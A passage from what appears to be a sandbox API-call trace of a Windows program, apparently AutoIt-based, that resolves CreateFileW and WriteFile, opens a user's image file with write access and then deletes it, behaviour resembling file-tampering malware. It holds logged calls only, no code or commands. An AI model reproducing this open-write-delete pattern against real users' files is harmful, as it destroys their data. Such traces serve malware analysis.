lpMsg=0x87ee3c) returned 0 [0190.145] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.145] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0190.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0190.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0190.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0190.145] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0190.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0190.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0190.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0190.145] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0190.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0190.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0190.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0190.146] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0190.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0190.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0190.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0190.146] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0190.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0190.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0190.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0190.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0190.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0190.146] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0190.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0190.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0190.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0190.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0190.146] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0190.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0190.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0190.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd588 [0190.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd588, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0190.147] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\rulw.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0190.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0190.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0190.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0190.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0190.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0190.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0190.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0190.147] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.147] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0190.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0190.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0190.148] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0190.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0190.157] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0190.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0190.157] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0190.157] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0190.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0190.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0190.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0190.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0190.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0190.157] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0190.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0190.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0190.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0190.157] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0190.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0190.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0190.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bd408 [0190.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd408, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0190.158] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.158] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0190.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0190.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0190.158] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0190.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0190.158] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0190.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0190.158] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0190.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0190.158] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0190.158] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0190.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0190.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0190.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0190.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0190.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0190.159] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0190.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0190.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0190.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0190.159] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0190.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0190.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0190.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba270 [0190.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba270, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0190.159] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.159] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0190.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0190.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0190.159] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0190.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0190.159] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0190.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0190.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0190.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0190.160] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png", lpFilePart=0x0) returned 0x4d [0190.160] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79a73a50, ftCreationTime.dwHighDateTime=0x1d5e3c6, ftLastAccessTime.dwLowDateTime=0x11687980, ftLastAccessTime.dwHighDateTime=0x1d5dc33, ftLastWriteTime.dwLowDateTime=0x16928d40, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x26c2, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="rULw.png", cAlternateFileName="")) returned 0x90af58 [0190.160] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\rulw.png")) returned 1 [0190.161] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79a73a50, ftCreationTime.dwHighDateTime=0x1d5e3c6, ftLastAccessTime.dwLowDateTime=0x11687980, ftLastAccessTime.dwHighDateTime=0x1d5dc33, ftLastWriteTime.dwLowDateTime=0x16928d40, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x26c2, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="rULw.png", cAlternateFileName="")) returned 0 [0190.162] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0190.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0190.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0190.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0190.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0190.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9100 | out: hHeap=0x8a0000) returned 1 [0190.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0190.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0190.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0190.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0190.162] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0190.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0190.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0190.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0190.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0190.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0190.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0190.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0190.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0190.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0190.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0190.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0190.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0190.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0190.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0190.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0190.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0190.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0190.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0190.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0190.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0190.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0190.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0190.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0190.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0190.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0190.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0190.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0190.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0190.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0190.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0190.164] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0190.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0190.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0190.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0190.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0190.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0190.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0190.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0190.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0190.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0190.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0190.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0190.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0190.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0190.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0190.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0190.165] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0190.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0190.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0190.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0190.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ad0 [0190.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0190.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0190.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0190.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0190.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0190.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdb10 [0190.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0190.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0190.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0190.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0190.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0190.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0190.165] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", 